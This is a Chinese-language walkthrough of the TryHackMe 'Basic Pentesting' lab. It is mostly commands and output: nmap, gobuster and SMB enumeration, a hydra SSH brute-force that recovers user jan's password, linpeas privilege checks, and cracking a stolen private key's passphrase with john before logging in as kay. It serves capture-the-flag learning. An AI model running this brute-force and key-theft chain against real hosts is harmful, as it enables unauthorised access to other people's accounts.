Try hack me Basic Pentesting Write up#

nmap找服務#

具備ssh、http、smb服務

1
─(kali㉿kali)-[~/Desktop]
2
└─$ sudo nmap -F 10.48.191.207 -sV -sC --open
3
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-30 20:56 -0500
4
Nmap scan report for 10.48.191.207
5
Host is up (0.040s latency).
6
Not shown: 82 filtered tcp ports (no-response), 14 closed tcp ports (reset)
7
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
8
PORT    STATE SERVICE     VERSION
9
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
10
| ssh-hostkey:
11
|   3072 32:8b:8a:cb:10:fc:64:90:f3:23:41:1d:d1:82:f4:09 (RSA)
12
|   256 f3:ee:e0:e1:d4:67:b1:3b:88:c5:86:d8:59:44:1f:d9 (ECDSA)
13
|_  256 10:73:c2:a5:88:b4:83:f3:7e:62:08:19:71:b8:07:ec (ED25519)
14
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
15
|_http-title: Site doesn't have a title (text/html).
16
|_http-server-header: Apache/2.4.41 (Ubuntu)
17
139/tcp open  netbios-ssn Samba smbd 4
18
445/tcp open  netbios-ssn Samba smbd 4
19
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
20

21
Host script results:
22
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
23
| smb2-time:
24
|   date: 2026-01-31T01:56:59
25
|_  start_date: N/A
26
|_clock-skew: 6s
27
| smb2-security-mode:
28
|   3.1.1:
29
|_    Message signing enabled but not required
30

31
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
32
Nmap done: 1 IP address (1 host up) scanned in 31.08 seconds

gobuster炸目錄#

找到隱藏目錄development

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ gobuster dir -u 10.48.138.163 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
3
===============================================================
4
Gobuster v3.8.2
5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6
===============================================================
7
[+] Url:                     http://10.48.138.163
8
[+] Method:                  GET
9
[+] Threads:                 10
10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
11
[+] Negative Status codes:   404
12
[+] User Agent:              gobuster/3.8.2
13
[+] Timeout:                 10s
14
===============================================================
15
Starting gobuster in directory enumeration mode
16
===============================================================
17
development          (Status: 301) [Size: 320] [--> http://10.48.138.163/development/]
18
server-status        (Status: 403) [Size: 278]
19
Progress: 29999 / 29999 (100.00%)
20
===============================================================
21
Finished
22
===============================================================

訪問隱藏目錄#

dev.txt、j.txt，沒太多資訊，僅說密碼很弱

1
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
2
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
3
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
4
using version 2.5.12, because other versions were giving me trouble. -K
5

6
2018-04-22: SMB has been configured. -K
7

8
2018-04-21: I got Apache set up. Will put in our content later. -J

1
For J:
2

3
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
4
and I was able to crack your hash really easily. You know our password policy, so please follow
5
it? Change that password ASAP.
6

7
-K

使用enum4linux蒐集smb資訊#

發現有三個使用者kay、jan、ubuntu，同時支持匿名smb

1
─(kali㉿kali)-[~/Desktop]
2
└─$ enum4linux -a 10.48.191.207
3
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jan 30 21:14:49 2026
4

5
 =========================================( Target Information )=========================================
6

7
Target ........... 10.48.191.207
8
RID Range ........ 500-550,1000-1050
9
Username ......... ''
10
Password ......... ''
11
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
12

13

14
 ===========================( Enumerating Workgroup/Domain on 10.48.191.207 )===========================
15

16

17
[+] Got domain/workgroup name: WORKGROUP
18

19

20
 ===============================( Nbtstat Information for 10.48.191.207 )===============================
21

22
Looking up status of 10.48.191.207
23
        BASIC2          <00> -         B <ACTIVE>  Workstation Service
24
        BASIC2          <03> -         B <ACTIVE>  Messenger Service
25
        BASIC2          <20> -         B <ACTIVE>  File Server Service
26
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
27
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
28
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
29
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
30

31
        MAC Address = 00-00-00-00-00-00
32

33
 ===================================( Session Check on 10.48.191.207 )===================================
34

35

36
[+] Server 10.48.191.207 allows sessions using username '', password ''
37

38

39
 ================================( Getting domain SID for 10.48.191.207 )================================
40

41
Domain Name: WORKGROUP
42
Domain Sid: (NULL SID)
43

44
[+] Can't determine if host is part of domain or part of a workgroup
45

46

47
 ==================================( OS information on 10.48.191.207 )==================================
48

49

50
[E] Can't get OS info with smbclient
51

52

53
[+] Got OS info for 10.48.191.207 from srvinfo:
54
        BASIC2         Wk Sv PrQ Unx NT SNT Samba Server 4.15.13-Ubuntu
55
        platform_id     :       500
56
        os version      :       6.1
57
        server type     :       0x809a03
58

59

60
 =======================================( Users on 10.48.191.207 )=======================================
61

62
Use of uninitialized value $users in print at ./enum4linux.pl line 972.
63
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
64

65
Use of uninitialized value $users in print at ./enum4linux.pl line 986.
66
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
67

68
 =================================( Share Enumeration on 10.48.191.207 )=================================
69

70
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
71

72
        Sharename       Type      Comment
73
        ---------       ----      -------
74
        Anonymous       Disk
75
        IPC$            IPC       IPC Service (Samba Server 4.15.13-Ubuntu)
76
Reconnecting with SMB1 for workgroup listing.
77
Protocol negotiation to server 10.48.191.207 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
78
Unable to connect with SMB1 -- no workgroup available
79

80
[+] Attempting to map shares on 10.48.191.207
81

82
//10.48.191.207/Anonymous       Mapping: OK Listing: OK Writing: N/A
83

84
[E] Can't understand response:
85

86
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
87
//10.48.191.207/IPC$    Mapping: N/A Listing: N/A Writing: N/A
88

89
 ===========================( Password Policy Information for 10.48.191.207 )===========================
90

91
Password:
92

93

94
[+] Attaching to 10.48.191.207 using a NULL share
95

96
[+] Trying protocol 139/SMB...
97

98
[+] Found domain(s):
99

100
        [+] BASIC2
101
        [+] Builtin
102

103
[+] Password Info for Domain: BASIC2
104

105
        [+] Minimum password length: 5
106
        [+] Password history length: None
107
        [+] Maximum password age: 136 years 37 days 6 hours 21 minutes
108
        [+] Password Complexity Flags: 000000
109

110
                [+] Domain Refuse Password Change: 0
111
                [+] Domain Password Store Cleartext: 0
112
                [+] Domain Password Lockout Admins: 0
113
                [+] Domain Password No Clear Change: 0
114
                [+] Domain Password No Anon Change: 0
115
                [+] Domain Password Complex: 0
116

117
        [+] Minimum password age: None
118
        [+] Reset Account Lockout Counter: 30 minutes
119
        [+] Locked Account Duration: 30 minutes
120
        [+] Account Lockout Threshold: None
121
        [+] Forced Log off Time: 136 years 37 days 6 hours 21 minutes
122

123

124

125
[+] Retieved partial password policy with rpcclient:
126

127

128
Password Complexity: Disabled
129
Minimum Password Length: 5
130

131

132
 ======================================( Groups on 10.48.191.207 )======================================
133

134

135
[+] Getting builtin groups:
136

137

138
[+]  Getting builtin group memberships:
139

140

141
[+]  Getting local groups:
142

143

144
[+]  Getting local group memberships:
145

146

147
[+]  Getting domain groups:
148

149

150
[+]  Getting domain group memberships:
151

152

153
 ==================( Users on 10.48.191.207 via RID cycling (RIDS: 500-550,1000-1050) )==================
154

155

156
[I] Found new SID:
157
S-1-22-1
158

159
[I] Found new SID:
160
S-1-5-32
161

162
[I] Found new SID:
163
S-1-5-32
164

165
[I] Found new SID:
166
S-1-5-32
167

168
[I] Found new SID:
169
S-1-5-32
170

171
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
172

173

174
S-1-5-32-544 BUILTIN\Administrators (Local Group)
175
S-1-5-32-545 BUILTIN\Users (Local Group)
176
S-1-5-32-546 BUILTIN\Guests (Local Group)
177
S-1-5-32-547 BUILTIN\Power Users (Local Group)
178
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
179
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
180
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
181

182
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
183

184
S-1-22-1-1000 Unix User\kay (Local User)
185
S-1-22-1-1001 Unix User\jan (Local User)
186
S-1-22-1-1002 Unix User\ubuntu (Local User)
187

188
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
189

190
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
191
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
192

193
 ===============================( Getting printer info for 10.48.191.207 )===============================
194

195
No printers returned.
196

197

198
enum4linux complete on Fri Jan 30 21:22:59 2026
199

200

201
─(kali㉿kali)-[~/Desktop]
202
└─$ sudo nmap -F 10.48.191.207 -sV -sC --open
203
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-30 20:56 -0500
204
Nmap scan report for 10.48.191.207
205
Host is up (0.040s latency).
206
Not shown: 82 filtered tcp ports (no-response), 14 closed tcp ports (reset)
207
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
208
PORT    STATE SERVICE     VERSION
209
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
210
| ssh-hostkey:
211
|   3072 32:8b:8a:cb:10:fc:64:90:f3:23:41:1d:d1:82:f4:09 (RSA)
212
|   256 f3:ee:e0:e1:d4:67:b1:3b:88:c5:86:d8:59:44:1f:d9 (ECDSA)
213
|_  256 10:73:c2:a5:88:b4:83:f3:7e:62:08:19:71:b8:07:ec (ED25519)
214
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
215
|_http-title: Site doesn't have a title (text/html).
216
|_http-server-header: Apache/2.4.41 (Ubuntu)
217
139/tcp open  netbios-ssn Samba smbd 4
218
445/tcp open  netbios-ssn Samba smbd 4
219
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
220

221
Host script results:
222
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
223
| smb2-time:
224
|   date: 2026-01-31T01:56:59
225
|_  start_date: N/A
226
|_clock-skew: 6s
227
| smb2-security-mode:
228
|   3.1.1:
229
|_    Message signing enabled but not required
230

231
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
232
Nmap done: 1 IP address (1 host up) scanned in 31.08 seconds

smbmap找smb分享#

1
[+] IP: 10.48.138.163:445       Name: 10.48.138.163             Status: NULL Session
2
        Disk                                                    Permissions     Comment
3
        ----                                                    -----------     -------
4
        Anonymous                                               READ ONLY
5
        IPC$                                                    NO ACCESS       IPC Service (Samba Server 4.15.13-Ubuntu)
6
[*] Closed 1 connections

smbclient匿名連線#

沒什麼資訊

1
┌──(kali㉿kali)-[~/Desktop]
2
└─$ smbclient //10.48.138.163/Anonymous -N
3
Try "help" to get a list of possible commands.
4
smb: \> ls
5
  .                                   D        0  Thu Apr 19 13:31:20 2018
6
  ..                                  D        0  Thu Apr 19 13:13:06 2018
7
  staff.txt                           N      173  Thu Apr 19 13:29:55 2018
8

9
                14282840 blocks of size 1024. 6244448 blocks available
10
smb: \>

1
Announcement to staff:
2

3
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
4
this is how mistakes happen. (This means you too, Jan!)
5

6
-Kay

hydra暴力破解ssh#

找到jan的密碼armando

1
─(kali㉿kali)-[~/Desktop]
2
└─$ hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.48.191.207
3
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
4

5
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-30 21:36:07
6
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
7

8
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
9
[DATA] attacking ssh://10.48.191.207:22/
10
[STATUS] 195.00 tries/min, 195 tries in 00:01h, 14344208 to do in 1226:01h, 12 active
11
 [STATUS] 194.33 tries/min, 583 tries in 00:03h, 14343820 to do in 1230:11h, 12 active
12
[22][ssh] host: 10.48.191.207   login: jan   password: armando
13
1 of 1 target successfully completed, 1 valid password found
14
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
15
[ERROR] 4 targets did not resolve or could not be connected
16
[ERROR] 0 target did not complete
17
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-01-30 21:40:18

linPeas找權限提升漏洞#

先透過scp丟檔案給靶機，後透過linPeas發現/home/kay目錄下有個id_rsa檔案，並且jan有讀取權限

1
bash ./linpeas.sh > linpeas.txt

1
/home/kay/.ssh/id_rsa

ssh2johb解密#

cat出來嘗試使用ssh登入，會發現要輸入密碼解密私鑰，使用ssh2john轉成hash後使用john破解，找到密碼beeswax

1
ssh2john kay_id_rsa > kay_hash.txt
2

3
──(kali㉿kali)-[~/Desktop]
4
└─$ john kay_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
5
Using default input encoding: UTF-8
6
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
7
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
8
Cost 2 (iteration count) is 1 for all loaded hashes
9
Will run 2 OpenMP threads
10
Press 'q' or Ctrl-C to abort, almost any other key for status
11
beeswax          (./kay_id_rsa)
12
1g 0:00:00:00 DONE (2026-01-31 21:42) 25.00g/s 2068Kp/s 2068Kc/s 2068KC/s behlat..bball40
13
Use the "--show" option to display all of the cracked passwords reliably
14
Session completed.

使用ssh登入kay#

我們現在就成功使用kay的私鑰登入ssh，可在其桌面上讀pass.bak，取得最後的flag

1
ssh -i kay_id_rsa kay@10.48.138.163
2

3
cat /home/kay/pass.bak